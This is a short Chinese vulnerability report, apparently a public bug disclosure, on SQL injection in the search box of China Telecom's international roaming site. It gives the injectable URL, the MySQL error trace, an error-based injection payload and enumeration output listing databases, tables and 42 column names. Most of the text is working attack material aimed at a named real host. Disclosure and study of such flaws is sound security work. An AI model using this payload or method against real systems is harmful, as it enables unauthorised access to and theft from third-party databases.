中国电信国际漫游 搜索处的注入漏洞。 在搜索栏,输入1’,带上单引号。会发现出错。返回的关键信息是:
org.springframework.web.util.NestedServletException: Request processing failed; nested exception is org.springframework.jdbc.BadSqlGrammarException: StatementCallback; bad SQL grammar [select count(*) from (select * from T_LUCENE_RELATEDKEYWORDS a WHERE upper(a.keyName) like '%1'%' and a.isValid=1 order by orders desc) t]; nested exception is java.sql.SQLException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' and a.isValid=1 order by orders desc) t' at line 1 org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:656) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:549) javax.servlet.http.HttpServlet.service(HttpServlet.java:617) javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
数据是直接带入sql语句中的。 找一个注入点:
http://manyou.189.cn/search//front/search.do?key=1&className=%E8%87%AA%E5%8A%A9%E6%9C%8D%E5%8A%A1
payload:key=1' AND (SELECT 3497 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,113,102,58),(SELECT (CASE WHEN (3497=3497) THEN 1 ELSE 0 END)),CHAR(58,100,101,98,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'eDxm'='eDxm&className=自助服务 注入结果如下:
available databases [3]: [*] information_schema [*] jsearch [*] manyouideal
Database: manyouideal [1 table] +--------------+ | km_gm_common | +--------------+
Database: manyouideal Table: km_gm_common [42 columns] +--------------------+---------------+ | Column | Type | +--------------------+---------------+ | CALL_CHINA_NO_HK | varchar(1000) | | CALL_NATIVE | varchar(1000) | | CALL_OTHER_COUNTRY | varchar(800) | | CARDTYPE | varchar(1000) | | CARDTYPESORT | int(11) | | CDMA1X | varchar(500) | | CITY | varchar(1000) | | CONSULATE_PHONE | varchar(500) | | COUNTRY | varchar(1000) | | COUNTRY_AREA | varchar(500) | | COUNTRY_CODE | varchar(500) | | COUNTRY_NAME_EN | varchar(500) | | EMBASSY_PHONE | varchar(500) | | EMERGENCY_PHONE | varchar(500) | | FREQUENCY_RANGE | varchar(500) | | GPRS | varchar(500) | | HEAD_133 | varchar(800) | | ID | int(11) | | IDCODE | varchar(50) | | INTERNET | varchar(300) | | JIANPIN | varchar(50) | | MIFI | varchar(300) | | MSG_CHAR_LIMIT | varchar(500) | | NATIVE_MOBILEPHONE | varchar(500) | | NATIVE_TALK | varchar(500) | | NETWORK | varchar(1000) | | NETWORK_DEFAULT | varchar(500) | | NOTICE | varchar(1500) | | OLDID | int(11) | | OUTLET | varchar(100) | | PINYIN | varchar(50) | | RECEIVE_CALL | varchar(800) | | RECEIVE_CODE | varchar(500) | | RECEIVE_SHORTMSG | varchar(500) | | REMOTE_MOBILEPHONE | varchar(500) | | REMOTE_TALK | varchar(500) | | SEND_CHINA_LAND | varchar(500) | | SEND_OTHER_COUNTRY | varchar(500) | | SHORTMSG_CODE | varchar(500) | | SORTNUMER | int(11) | | VOLTAGE | varchar(200) | | WIFI | varchar(500) | +--------------------+---------------+
Database: jsearch [25 tables] +------------------------------+ | country | | t_lucene_ad | | t_lucene_class | | t_lucene_config | | t_lucene_content | | t_lucene_datasource | | t_lucene_ftpserverlist | | t_lucene_hotlabels | | t_lucene_indexlogs | | t_lucene_indextask | | t_lucene_indextask_ftpserver | | t_lucene_keyrecovery | | t_lucene_keywordhits | | t_lucene_keywordhits_0612 | | t_lucene_keywords | | t_lucene_minganci | | t_lucene_module | | t_lucene_profile | | t_lucene_relatedkeywords | | t_lucene_searchserver | | t_lucene_servernode | | t_lucene_typehits | | t_lucene_users | | t_lucene_visitlog | | t_lucene_weight | +------------------------------+
只是检索信息的数据,不过这种还是需要关注下。